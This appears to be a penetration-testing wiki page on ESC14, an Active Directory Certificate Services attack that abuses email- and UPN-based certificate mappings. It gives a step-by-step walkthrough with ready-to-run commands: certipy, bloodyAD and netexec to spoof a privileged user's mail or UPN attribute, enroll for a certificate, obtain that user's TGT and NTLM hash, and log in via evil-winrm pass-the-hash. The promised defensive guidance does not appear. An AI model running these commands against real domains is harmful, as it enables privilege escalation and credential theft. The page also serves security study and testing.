ESC14

Introduction

ESC14 is a critical vulnerability in Active Directory Certificate Services (AD CS) that allows attackers to authenticate as any user by exploiting weak certificate mappings. This attack leverages the altSecurityIdentities attribute combined with certificate template miscofigurations to acheve privilege escalation.

In this article, we'll explore how ESC14 works, the different exploitation methods (email-based and UPN-based), and how to properly configure and defend against this vulnerablity.

Understanding altSecurityIdentities

The altSecurityIdentities attribute is an Active Directory property that maps certificates to user accounts, enabling passwardless authenticaton. Think of it as a rulebook that tells the Domain Controller: "If someone presents a certificate with these specific properties, authenticate them as this user."

Supported Mapping Formats

Active Directory supports multiple certificate mapping formats, but they're not all equally exploitable:

1. Email-Based (RFC822) - EXPLOITABLE

X509:<RFC822>[email protected]

Maps any certificate containing this email address to the user. This is vulnerable because attackers can modify the mail attribute.

2. UPN-Based - EXPLOITABLE

X509:<UPN>[email protected]

Maps certificates containing this User Principal Name. Vulnerable because the userPrincipalName attribute can be modified.

3. Subject-Based - NOT EXPLOITABLE

X509:<S>CN=User Name,OU=Dept,DC=domain,DC=com

Requires exact Subject match. Not exploitable via ESC14 because the CA controls the Subject field based on the requesting user.

4. Issuer + Subject - NOT EXPLOITABLE

X509:<I>CN=CA-Name,DC=domain,DC=com<S>CN=User

Requires specific CA and Subject. Both values are CA-controlled and cannot be spoofed.

5. Serial Number + Issuer - NOT EXPLOITABLE

X509:<SR>1234567890<I>CN=CA-Name,DC=domain,DC=com

The serial number is randomly generated by the CA and unpredictable.

6. Subject Key Identifier (SKI) - NOT EXPLOITABLE

X509:<SKI>a1b2c3d4e5f6...

SKI is cryptographically derived from the certificate's public key, completely CA-controlled.

Why Only Email and UPN Are Exploitable?

The key difference is who controls the values:

Email/UPN: Stored as LDAP attributes (mail, userPrincipalName) that users or administrators can modify
Subject/Issuer/Serial/SKI: Generated by the Certificate Authority during issuance, cannot be controlled by the requester

When you request a certificate, the CA queries your LDAP attributes and blindly includes them in the certificate without verifying they actually belong to you.

Setting altSecurityIdentities: Attacker Perspective

Scenario 1: Empty altSecurityIdentities (Maximum Flexibility)

If the target user has no altSecurityIdentities set AND you have write permissions on that user, you can set ANY format you control:

# Set email-based mapping
bloodyAD set object targetuser altSecurityIdentities -v "X509:<RFC822>[email protected]"

# Set UPN-based mapping  
bloodyAD set object targetuser altSecurityIdentities -v "X509:<UPN>[email protected]"

# Set subject-based (useless for ESC14 but possible)
bloodyAD set object targetuser altSecurityIdentities -v "X509:<S>CN=attacker"

Attack strategy: Choose a format you can control (email or UPN), then modify your own controlled user's attributes to match.

Scenario 2: Already Populated (Type Locked)

If altSecurityIdentities is already set, you can only modify it to use the SAME type:

Already set to email:

# Original: X509:<RFC822>[email protected]
# You can change to: X509:<RFC822>[email protected]
# You CANNOT change to: X509:<S>CN=something (different type)

Best approach: Don't touch the target's altSecurityIdentities at all. Instead, modify a controlled user's attributes to match the existing mapping.

How Certificate-Based Authentication Works

When you present a certificate for authentication, the Domain Controller follows this priority:

Priority 1: Check for SID in certificate If present, directly authenticate as that user (most secure).

Priority 2: Check altSecurityIdentities Query LDAP for users whose altSecurityIdentities matches certificate properties (email, UPN, etc.).

Priority 3: Check UPN matching Match certificate UPN with user's userPrincipalName attribute.

Priority 4: Check Subject matching Match certificate Subject with user's Distinguished Name.

The vulnerability occurs when certificates lack SID (due to NoSecurityExtension flag), forcing authentication to rely on weaker mappings like email or UPN.

The ESC14 Attack Explained

Core Vulnerability

Certificate Authorities trust LDAP attribute values without validation.

When a template requires email or UPN in certificates, the CA queries the requesting user's attributes and includes them as-is. The CA doesn't verify that these values actually belong to that user.

Attack Flow

Target user (high-privileged) has: altSecurityIdentities: X509:<RFC822>[email protected]
Attacker controls low-privileged user who can enroll in vulnerable template
Attacker modifies controlled user's mail attribute: mail: [email protected]
Attacker requests certificate - CA includes the spoofed email
Certificate contains: Subject=lowpriv, [email protected], No SID
Attacker authenticates - DC checks altSecurityIdentities, finds admin user
DC authenticates attacker as admin - privilege escalation complete!

Why It Works

No ownership validation: CA doesn't verify email belongs to requesting user
No SID binding: Template's NoSecurityExtension flag removes SID from certificate
Trusted mappings: DC assumes altSecurityIdentities are legitimate
Modifiable attributes: Attackers often have permissions to change mail/UPN

Prerequisites for ESC14

1. Vulnerable Certificate Template

Certificate Name Flag: SubjectAltRequireEmail OR SubjectAltRequireUpn
Enrollment Flag: NoSecurityExtension
Enrollment permissions for attacker-controlled user

2. Target User Configuration

Has altSecurityIdentities set with email or UPN format
Higher privileges than attacker's current access

3. Attribute Modification Rights

GenericAll, WriteDACL, or WriteProperty on controlled user
Ability to modify mail or userPrincipalName attribute

4. Certificate Enrollment Rights

Controlled user can enroll in the vulnerable template

Exploitation: Email-Based Attack

Step 1: Reconnaissance

Identify target with email-based mapping:

netexec ldap dc.corp.com -u lowpriv -p pass \
  --query "(sAMAccountName=admin)" altSecurityIdentities

Look for: altSecurityIdentities: X509:<RFC822>[email protected]

Step 2: Find Vulnerable Template

certipy find -vulnerable -u lowpriv -p pass -dc-ip 10.10.10.10

Identify template with:

SubjectAltRequireEmail flag
NoSecurityExtension flag
Enrollment rights for your user

Step 3: Modify Mail Attribute

bloodyAD --host dc.corp.com -d corp.com -u lowpriv -p pass \
  set object controlleduser mail -v [email protected]

Verify:

bloodyAD get object controlleduser --attr mail

Step 4: Request Certificate

certipy req -username [email protected] -password pass \
  -target dc.corp.com -ca corp-CA -template VulnerableTemplate

Output: Certificate saved as controlleduser.pfx

Step 5: Verify Certificate Content

openssl pkcs12 -in controlleduser.pfx -clcerts -nokeys -passin pass: | \
  openssl x509 -text -noout

Check for:

Subject: CN=controlleduser
Email: [email protected] (spoofed!)
No SID extension

Step 6: Authenticate as Target

sudo ntpdate dc.corp.com
certipy auth -pfx controlleduser.pfx -username admin -dc-ip 10.10.10.10

Result: TGT and NTLM hash for admin user obtained!

Step 7: Use Credentials

evil-winrm -i dc.corp.com -u admin -H <obtained_hash>

Exploitation: UPN-Based Attack

The UPN-based attack is nearly identical, with only the attribute differing:

Key Differences

Attribute modified: userPrincipalName instead of mail Template flag: SubjectAltRequireUpn instead of SubjectAltRequireEmail Certificate SAN: UPN field instead of email field

Attack Steps

Modify UPN instead of mail:

bloodyAD set object controlleduser userPrincipalName -v [email protected]

Request certificate (same as email-based):

certipy req -username [email protected] -password pass \
  -target dc.corp.com -ca corp-CA -template VulnerableTemplate

Authenticate (same process):

certipy auth -pfx controlleduser.pfx -username admin

Combined Approach

For maximum reliability, modify both attributes:

bloodyAD set object controlleduser mail -v [email protected]
bloodyAD set object controlleduser userPrincipalName -v [email protected]

This ensures success regardless of which field the template includes.

References

https://specterops.io/blog/2024/02/28/adcs-esc14-abuse-technique/

PreviousMicrosoft Management Console (MMC)NextSilver & Golden Tickets

Last updated 1 month ago

hashtagIntroduction

hashtagUnderstanding altSecurityIdentities

hashtagSupported Mapping Formats

hashtagWhy Only Email and UPN Are Exploitable?

hashtagSetting altSecurityIdentities: Attacker Perspective

hashtagScenario 1: Empty altSecurityIdentities (Maximum Flexibility)

hashtagScenario 2: Already Populated (Type Locked)

hashtagHow Certificate-Based Authentication Works

hashtagThe ESC14 Attack Explained

hashtagCore Vulnerability

hashtagAttack Flow

hashtagWhy It Works

hashtagPrerequisites for ESC14

hashtagExploitation: Email-Based Attack

hashtagStep 1: Reconnaissance

hashtagStep 2: Find Vulnerable Template

hashtagStep 3: Modify Mail Attribute

hashtagStep 4: Request Certificate

hashtagStep 5: Verify Certificate Content

hashtagStep 6: Authenticate as Target

hashtagStep 7: Use Credentials

hashtagExploitation: UPN-Based Attack

hashtagKey Differences

hashtagAttack Steps

hashtagCombined Approach

hashtagReferences